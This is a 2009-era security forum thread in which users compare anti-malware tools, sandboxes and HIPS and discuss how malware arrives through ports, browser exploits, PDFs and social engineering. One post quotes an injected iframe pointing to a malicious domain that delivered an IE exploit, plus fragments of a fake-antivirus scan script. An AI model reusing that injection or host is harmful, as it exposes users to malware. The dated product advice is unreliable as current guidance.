My current configuration...
Anti-Virus: GData AntiVirus 2009
Anti-Malware: ASquared Anto-Malware
Firewall: Comodo Firewall
Browser: Firefox with NoScript

I am looking for a another program, maybe two, to protect my system should the antivirus miss a 0day threat. I have tried ThreatFire, Pervx Edge 3, DefenseWall, and DriveSentry.

I disabled GData / ASquared and downloaded a 4 trojans and worms to test these applications. Out of 4 malware threats ThreatFire (set on max) detected one worm which was trying to inject code into Kernel32. Pervx detected 3 files. DriveSentry picked up all the threats on execute. I'm not sure if DefenseWall worked at all, it didn't seem to do anything, but did allow all the malware threats to execute and install into the system.

Am I right in saying that Prevx EDGE 3 is only a malware scanner based on a online database?
What exactly does DefenseWall do?
Finally which applications should I use to compliment my antivirus program?

Thanks for the heads up!

-{ Quote: "My current configuration...
Anti-Virus: GData AntiVirus 2009
Anti-Malware: ASquared Anto-Malware
Firewall: Comodo Firewall
Browser: Firefox with NoScript

I am looking for a another program, maybe two, to protect my system should the antivirus miss a 0day threat. I have tried ThreatFire, Pervx Edge 3, DefenseWall, and DriveSentry.

I disabled GData / ASquared and downloaded a 4 trojans and worms to test these applications. Out of 4 malware threats ThreatFire (set on max) detected one worm which was trying to inject code into Kernel32. Pervx detected 3 files. DriveSentry picked up all the threats on execute. I'm not sure if DefenseWall worked at all, it didn't seem to do anything, but did allow all the malware threats to execute and install into the system.



Am I right in saying that Prevx EDGE 3 is only a malware scanner based on a online database?
What exactly does DefenseWall do?
Finally which applications should I use to compliment my antivirus program?

Thanks for the heads up!" }-

Welcome to Wilders.Your thread title is a bit misleading in terms of what you are asking.

I personally think that GData is enough along with Comodo and Firefox. You should learn how to effectively use DefenseWall -a sandbox HIPS- (I haven't heard one single complaint about it, although I don't use it myself) or try alternatives: Sandboxie (sandboxes your browser), Returnil (virtualizes your HD, it has a free version as well), Shadow Defender (another virtualizer, my choice).

Using a sandbox/virtualizer makes redundant any antimalware type of program like ASquared (IMO of course). If I were you I would make my first priority adding an imaging program that works to your system (which means backing up your system and trying to restore it).

Well you are going to get allot of different anwsers so here it goes!

I use NOD32 with Prevx Edge is all you need and use SUPERAnti-Spyware Free and Malwarebytes' Anti-Malware Free for weekly scans and WinPatrol Free is also good for changes made to your system!

And Comodo is a very good Free Firewall if you want to try another good one go with Online Armor Free or paid version!

In the end it will be up to you what you want to use!

TH

You're setup is fine, so you don't really need to add any other realtime protection.
Although you mentioned you used Threatfire and Prevx Edge.
I suggest you use any one of those as an additional layer of defense. It will compliment your current setup.
Though DriveSentry can cause a conflict with your primary AV (G-Data). Running 2 or more AVs simultaneously in realtime is NOT recommended.

You can also try using a variety of virtualization/sandbox programs.
Like previously mentioned by Osaban, you can try using Sandbox (sandboxes your default browser). Also add HD virtualization like Windows SteadyState, Returnil, or Shadow Protect, and you're good to go. ;D

-{ Quote: "What exactly does DefenseWall do?" }-
It's a policy-based sandboxing-style behaviour blocker that limits file, registry and system resources access for untrusted processes.

-{ Quote: "It's a policy-based sandboxing-style behaviour blocker that limits file, registry and system resources access for untrusted processes." }-cool;)

I installed defensewall using the administrator account, but use a limited user for daily surfing.

Some malicious programs insist on running as administrator, when they do defensewall does not stop them infecting the system even as untrusted processes.

Any ideas?

-{ Quote: "I installed defensewall using the administrator account, but use a limited user for daily surfing.

Some malicious programs insist on running as administrator, when they do defensewall does not stop them infecting the system even as untrusted processes.

Any ideas?" }-that is very strange cause as now i dont know any malware that can bypass defensewall when malware is run untrusted is put to jail:)

I have a laptop with XPAntiVirus2009 which is keen to tell me I have 17 trojans and insists on $49 to fix them. Of course Defensewall should have "jailed" it, but its in the program files and registry.

-{ Quote: "I have a laptop with XPAntiVirus2009 which is keen to tell me I have 17 trojans and insists on $49 to fix them. Of course Defensewall should have "jailed" it, but its in the program files and registry." }-
It is rogue software. DefenseWall offers you Rollback function from Files and registry traces. So if you know how you can easily removed them from your disk. But you don't have to. Just click on the Stop Atack button in DW or restart your computer - all these files which rogue software installed to your computer do not have any rights to do mess in your system. :thumb:

-{ Quote: "I have a laptop with XPAntiVirus2009 which is keen to tell me I have 17 trojans and insists on $49 to fix them. Of course Defensewall should have "jailed" it, but its in the program files and registry." }-

Did you get XPAntiVirus2009 before or afer you installed DefenseWall?

-{ Quote: "I have a laptop with XPAntiVirus2009 which is keen to tell me I have 17 trojans and insists on $49 to fix them. Of course Defensewall should have "jailed" it, but its in the program files and registry." }-
XPAntiVirus2009 is a malware itself. Do you really trust everything what is written (or told on TV, doesn't matter)?

-{ Quote: "I have a laptop with XPAntiVirus2009 which is keen to tell me I have 17 trojans and insists on $49 to fix them. Of course Defensewall should have "jailed" it, but its in the program files and registry." }-

Following up on Iyla's post, Just because a malware is on the HD or Registry does NOT mean it's executed.

This is how Comodo's Defense+ HIPS work. Defense+ stops malware from "executing", People get confused and say "Well hey, it's in my program folders" but Defense+ STOPPED it from executing, There is a difference. Execution is the key here.

Not sure how DefenseWall works though, But backing up Ilya's statement.

All in all. You need a layered security architecture with Prevention (Whether it would be DefenseWall or Comodo Defense+) as your first line of defense, and an AV comes 2nd as detection.

Cheers,
Josh

-{ Quote: "
All in all. You need a layered security architecture with Prevention (Whether it would be DefenseWall or Comodo Defense+) as your first line of defense, and an AV comes 2nd as detection.

Cheers,
Josh" }-
Totally agree.
1. prevention
2. detection
3. cure (i.e. backup software)

If it's operative(spamming false positives) it is allready executed.

-{ Quote: "If it's operative(spamming false positives) it is allready executed." }-now he has to get the fileassassin(mbam)to get rid of this litle bugger;D "Ditto"

-{ Quote: "Following up on Iyla's post, Just because a malware is on the HD or Registry does NOT mean it's executed.

This is how Comodo's Defense+ HIPS work. Defense+ stops malware from "executing", People get confused and say "Well hey, it's in my program folders" but Defense+ STOPPED it from executing, There is a difference. Execution is the key here.

Not sure how DefenseWall works though, But backing up Ilya's statement.

All in all. You need a layered security architecture with Prevention (Whether it would be DefenseWall or Comodo Defense+) as your first line of defense, and an AV comes 2nd as detection.

Cheers,
Josh" }-

Defense+, as far as I can tell, won't stop malware from executing. The user will. ;)
Unless, a newest version automatically blocks known malicious software. Is that it?

-{ Quote: "Defense+, as far as I can tell, won't stop malware from executing. The user will. ;)
Unless, a newest version automatically blocks known malicious software. Is that it?" }-no,you can easilly configure D+ to fully lock down your system tight, block the running of installers,drivers,dlls,etc,etc if you want to;D but is not by default you will have to dig into it and play with it to find it's fully potential;) (not out the box ofcourse)

-{ Quote: "no,you can easilly configure D+ to fully lock down your system tight, block the running of installers,drivers,dlls,etc,etc if you want to;D but is not by default you will have to dig into it and play with it to find it's fully potential;) (not out the box ofcourse)" }-

Well, that wouldn't make the system very usable, or easily usable. :D

So, it still works the very same way I used to remember (not so long ago).

It was Exist's comment that made me wonder if now worked different, when he said -{ Quote: "This is how Comodo's Defense+ HIPS work. Defense+ stops malware from "executing", People get confused and say "Well hey, it's in my program folders" but Defense+ STOPPED it from executing " }-

Defense+ won't block malware. Defense+ and other HIPS won't block, unless the user gets alerted for something, and the user then decides whether or not that's something that should be or not happening, and then, yes, block or allow.


Regards

-{ Quote: "I have a laptop with XPAntiVirus2009 which is keen to tell me I have 17 trojans and insists on $49 to fix them. Of course Defensewall should have "jailed" it, but its in the program files and registry." }-
If it you've executed the program and it's already installed on your system,
you will need to use a good anti-malware scanner to remove it.

I highly recommend MBAM or SAS.

Should DW stop malware infecting the system if the malware is run as administrator and DW is not? Even when the malware is untrusted.

DriveSentry is more of a classical HIPS with an AV component. Just disable one of AVs or have them scan at different times so they don't conflict. They can get along happily. I use Geswall as my sandbox. It works with any browser or program that connects to the Internet.

This discussion, 'Protection against malware without AV' seems oriented towards experienced users, yet I don't see that anyone except one person has mentioned what it is that you are protecting against.

'Malware' is a loaded word, which has no practical meaning without describing the delivery mechanism. Not knowing that, how do you know what you are protecting against?

If you take malware that is delivered via a Port, such as the worms, Blaster, Slammer, (they are still around!) and the recent conficker.a, then the appropriate protection is, of course, a router or firewall. A check of your log will show this protection doing its job by blocking the Trojan/Worm Ports. This can be referred to as the outer perimeter: Nothing gets inside.

207115

How about malware delivered via a web exploit? If you have Opera or Firefox, what else do you need? Is there an exploit out there that delivers a trojan that is successful against these browsers when properly configured? Give a URL so we can test. All target IE.

These are the ways malware can sneak in, and unless someone can show a URL that has an exploit that can penetrate the above, then I submit that those protective methods are sufficient. The Firewall and the Browser effectively stop malware at the outer perimeter, if you will: Nothing gets inside.

The other way malware is delivered is when the user gives permission to install. Ilya in Post #12 has addressed sufficiently what you are protecting against. That said, we can eliminate consideration of that method of delivery in this discussion.

The recent PDF exploits have given concern to some, so in the event you think you might open one of these infected files, you say, How to protect against it? This is easy, because the shell code in these files calls out to download a trojan executable.

TROJ_PIDIEF.IN
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ%5FPIDIEF%2EIN&VSect=T
-{ Quote: "This Trojan is a specially crafted .PDF file that exploits a zero-day vulnerability in Acrobat Reader Version 8.x and 9.0.
Differing variants of this file drop various malware onto the affected system. Below are some of the malware detected by Trend Micro that are dropped malwares by this PDF:

BKDR_NETCL.A
EXPL_EXECOD.A" }-Now, we don't have one of these files to test, but we can simulate the remote code execution method with an Autorun.inf file.

Take any installation disk and put into your CD drive. You need to enable Autorun for this, because you want to test your protection against an unauthorized executable from running. Here, I use a Photoshop installation CD. It uses an executable, Autoplay.exe to start the installation process. If the installation starts, I submit you are not sufficiently protected at the outer perimeter:

207117

However, since this executable is not permanently installed on my computer, I submit that it should not be able to run
without my permission:

207116

This could be malware in a PDF rather than Autorun, and is easily prevented by many solutions other than AV.

I don't consider a Sandbox to contain malware after it executes as a solution, for in my view, it is a poor excuse for not understanding how to prevent the malware from penetrating the outer perimeter and executing.

CONCLUSION

1) No discussion of preventing malware is useful without knowing what you are specifically protecting against.

2) Looking at the way malware penetrates (is delivered), protection against malware without AV is certainly possible, and it can be argued that all that is really needed are


a Router or Firewall


a Browser other than IE.


Ilya's advice in Post #12

3) For the "what if" remote code execution scenario such as a PDF exploit, anything that blocks the malware at the outer perimeter will work. So, add to the above:


one other solution (I use 'solution' rather than 'product' because some use SRP which is not a separate product)


----
rich

-{ Quote: "

[...]

a Browser other than IE.

[...]

" }-

The solution isn't everyone ditching IE, which is now safer than other previous versions, and start using, let's say Opera.

What would result from this action? Opera would be the most targeted browser, at the image of what happens with IE.

The more people using X browser, the more targeted it will become. The solution is for everyone not to use the same browser.

The reason why I don't use IE/Firefox for most of by browsing, is due to the fact that Opera isn't as widely used as IE and Firefox, hence less/practically not targeted.

But, what would happen if, let's say, 90% people would start using it? I guess that, by then, people would go back to IE, for not being as targeted as Opera? Then what, move to Opera again?...

Just like F-Secure mentions here, about the PDF exploits for Adobe and not only (http://www.f-secure.com/weblog/archives/00001623.html)

-{ Quote: "Do note that while we are recommending users move away from Adobe Reader, we are not recommending any particular replacement.

So, we're not recommending Foxit. We're not recommending Sumatra. Or PDF-Xchange, CoolPDF or eXPert PDF.

Instead, we recommend users to find their own Adobe Reader replacement.

This way we get more heterogeneous userbase, which is a good idea security-wise. Nobody wants to repeat what happened with the great IE —> Firefox switch. As 40% of users switched to Firefox, about 40% of the attacks switched to target Firefox.

Monocultures are bad. " }-

You make very good points, m00nbl00d.

While I used Opera/Firefox as examples of browsers that are not exploited, I did conclude by saying "a browser other than IE." There are many besides Opera and Firefox -- often some are mentioned in the Software forum here.

Yes, IE is becoming safer, but is still slow to patch exploits. I would not use IE without some added protection against remote code execution exploits.

As far as PDF readers: left unsaid is that many, including myself, use older versions of Adobe Acrobat which are not vulnerable to the current exploits. This can be confirmed in the Adobe advisories where the vulnerable versions are listed.

This of course would negate the need to worry about malware via PDF files, therefore, no other security product necessary. But you can apply this idea to other delivery methods of malware, which I did not discuss, such as SWF files (Flash).

Experienced users who take all of this into consideration just reinforce the idea that not much security apparatus is needed at all to maintain a safe computing environment.

----
rich

-{ Quote: "
I don't consider a Sandbox to contain malware after it executes as a solution, for in my view, it is a poor excuse for not understanding how to prevent the malware from penetrating the outer perimeter and executing.
" }-

I gather from what you are saying that you no longer use DeepFreeze and AntiExecutable.

Using Firefox as an example with the 'NoScript' extension will protect you from just about anything, the point is how do you know whether the script is benign or not, I mean what if you want to allow something to show the full contents of the page? I think a sandbox or a virtualizer would be practical to have in such situations.

-{ Quote: "I gather from what you are saying that you no longer use DeepFreeze and AntiExecutable. " }-I use Deep Freeze but not for the purpose of malware, rather, to keep my system partition always clean from temp, MRU and other such junk.

Deep Freeze works best as a malware protector on a single partition, such as the College where I worked. On multiple partitions such as I have where not all are frozen, malware can intrude on those. A good example was mentioned by fcukdat in another forum where he described a file infector that looked across all partitions. If I were concerned that such malware could intrude, I would *consider* a Sandbox, where, as I understand it, malware cannot do anything outside of it. But I'm not sure on that point, since I haven't tested. For example, in my DLL and self-contained executable tests using AppGuard, would Sandbox prevent IE from connecting out to the internet? That test was to suggest that data stealing could occur without an alert from AppGuard, since nothing was written to System. Deep Freeze also would be of no help in that scenario.

Regarding Anti-Executable, I use it for testing malware sites. Based on what I wrote in the previous post, nothing would ever alert here in normal work since the malware sites all require IE to trigger the payload. PDF and SWF files would not trigger malware because of other preventative measures here. However, I install it on other's computers because it is useful in locking down a family computer, for example, so that only the parents can download software/programs/games, etc., prevents email attachments from running in case of a lapse of good judgment, etc. Also some like to use IE. Even though people configure it properly for security and use it safely, nonetheless Microsoft is not always prompt in patching, so there is a potential danger, and AE protects.

-{ Quote: "Using Firefox as an example with the 'NoScript' extension will protect you from just about anything, the point is how do you know whether the script is benign or not, I mean what if you want to allow something to show the full contents of the page? I think a sandbox or a virtualizer would be practical to have in such situations." }-Do you have a current exploit in mind?

I look at all exploits when possible, and recent ones that use scripts fall into two categories.

1) SQL injection, where a user gets to a compromised site and an injected script or i-frame on the page redirects to a site that attempts to download malware. An example:


i frame src="http://bbs.jueduizuan.com"> /i frame>


Upon being redirected, this code triggers the download of the malware exploiting an IE vulnerability:

207136

Whereupon the trojan ri.exe is successfully blocked from downloading:

207137

Using a browser other than IE, this exploit fails to run at all here. Anti-Executable not necessary. Deep Freeze not necessary. Sandbox not necessary.

2) WinAntiVirus200x -- script on the page does the work:


script src='fileslist.js'>/script
script src='progressbar2.js?v=1.1'>/script
script src='common.js'>/script

...

function stateaction(state, data)
{
switch(state)
{
case 'BEGINSCAN':
startScan();


Whereupon the fake scan starts:

http://www.wilderssecurity.com/attachment.php?attachmentid=202212

This exploit is not browser-specific, therefore, depends on social engineering to trick the victim to download the malware:

http://www.wilderssecurity.com/attachment.php?attachmentid=202207

Assuming a user has scripting enabled and this fake scan runs and the download prompt appears, can Sandbox help?

----
rich

-{ Quote: "
How about malware delivered via a web exploit? If you have Opera or Firefox, what else do you need? Is there an exploit out there that delivers a trojan that is successful against these browsers when properly configured? Give a URL so we can test. All target IE.
" }-

See thread Browsers hacked -not all of them- at Pwn2Own contest (http://www.wilderssecurity.com/showthread.php?t=236532).

-{ Quote: "See thread Browsers hacked -not all of them- at Pwn2Own contest (http://www.wilderssecurity.com/showthread.php?t=236532)." }-I had skipped that article when I saw the word "contest" but decided to check it out since you mention it.

Aren't these vulnerabilities rather than working exploits? I *normally* don't pay attention to vulnerabilities, since they surface, are patched, and then new ones show up.

By the way, what is the significance of "pwn"?

----
rich

-{ Quote: "
Aren't these vulnerabilities rather than working exploits? I *normally* don't pay attention to vulnerabilities, since they surface, are patched, and then new ones show up.

By the way, what is the significance of "pwn"?
" }-

They're demonstrated working exploits.

Here is part of Wikipedia's entry for 'pwn':

-{ Quote: "Pwn (below: Various pronunciations) is a leetspeak slang term, derived from the verb "own",[1][2] as meaning to appropriate or to conquer to gain ownership. The term implies domination or humiliation of a rival, used primarily in the Internet gaming culture to taunt an opponent who has just been soundly defeated (e.g. "You just got pwned!"). The past tense may also be spelled: pwnd, pwn'd pwn3d, pwnt or powned.

In hacker jargon, pwn means to compromise or control, specifically another computer (server or PC), web site, gateway device, or application. It is synonymous with one of the definitions of hacking or cracking. An outside party who has pwned a system has obtained unauthorised administrative control of it." }-

-{ Quote: "They're demonstrated working exploits. " }-I need to re-phrase to mean exploits circulating in the wild. If they are not circulating, should one still be concerned enough to change the browser?

-{ Quote: "Here is part of Wikipedia's entry for 'pwn':" }-Thanks.

----
rich

-{ Quote: "I need to re-phrase to mean exploits circulating in the wild. If they are not circulating, should one still be concerned enough to change the browser?
" }-

That's your call - I can't answer that. There is apparently a $100,000 black market value for reliable IE exploits. There must be some incentive for people to pay that much money, and for these black markets to exist. Source: http://www.theregister.co.uk/2009/03/19/pwn2own_day1/

How does one find a vulnerabilities in software? I am guessing its not just a case of trial and error.

-{ Quote: "There is apparently a $100,000 black market value for reliable IE exploits. There must be some incentive for people to pay that much money, and for these black markets to exist. " }-I wasn't aware those exploits fetched such a high price!

My question about changing browsers was intended as 'food for thought' since it's occurred to me in the past that since so many vulnerabilities/exploits come and go for browsers, that the safest action resulting in no worries would be just to disconnect from the internet altogether!

More realistically, if a working exploit is not circulating in the wild, then one's chances of becoming victimized by it are not very likely.

On the other hand, one could switch to another browser until the vulnerability is patched, then switch back.

On the other hand #2, one could never really be sure that an unknown/unreported working exploit for the other browser might suddenly circulate, making it susceptible to installing malware. With that thought constantly nagging, one could never be sure any time she/he connected to the internet!

"What to do, what to do," she thought as she paced the room.

----
rich

-{ Quote: "
On the other hand #2, one could never really be sure that an unknown/unreported working exploit for the other browser might suddenly circulate, making it susceptible to installing malware." }-

That's why some people use limited user accounts, buffer overflow prevention products, HIPS, Anti-Executable, etc. Statistically though, it seems that most average users who are infected are being infected by being tricked into downloading software that they don't realize is malware.

-{ Quote: ".. it seems that most average users who are infected are being infected by being tricked into downloading software that they don't realize is malware." }-
That calls to mind a comment in a Prevx blog last year,

-{ Quote: "social engineering is still the primary vehicle of attacks and against that there's really no solution if it's used against a so wide range of users." }-and...

http://www.cio.in/news/viewArticle/ARTICLEID=5800121

-{ Quote: ""This is what we've been seeing all year," said Paul Ferguson, network architect at Trend Micro. "This illustrates that social engineering seems to be playing a larger role than we thought. The problem isn't due to software vulnerabilities in, say, the browser."" }-

----
rich

-{ Quote: "That calls to mind a comment in a Prevx blog last year,
" }-

Perhaps good advice to protect against the malware download threat is to use a browser with a good malware reputation service. According to this thread (http://www.wilderssecurity.com/showthread.php?p=1428720), Internet Explorer 8 has the best one by far.